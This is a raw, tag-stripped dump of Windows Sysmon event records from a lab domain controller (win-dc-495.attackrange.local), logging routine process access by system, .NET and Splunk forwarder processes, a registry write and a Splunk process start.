13:50:46.821{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9236-6005-1D04-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9236-6005-1C04-00000000A301}2128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.664{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9236-6005-1C04-00000000A301}2128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.664{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9236-6005-1C04-00000000A301}2128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 13241300x80000000000000008367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:50:46.664{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda0-0xec28b099) 11241100x80000000000000008366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:46.571{59A5CD1D-9235-6005-1A04-00000000A301}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12d8-0\System.Data.Entity.Design.dll2021-01-18 13:50:46.571 10341000x80000000000000008365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9236-6005-1B04-00000000A301}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9236-6005-1B04-00000000A301}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9236-6005-1B04-00000000A301}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.322{59A5CD1D-9236-6005-1B04-00000000A301}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9237-6005-1F04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 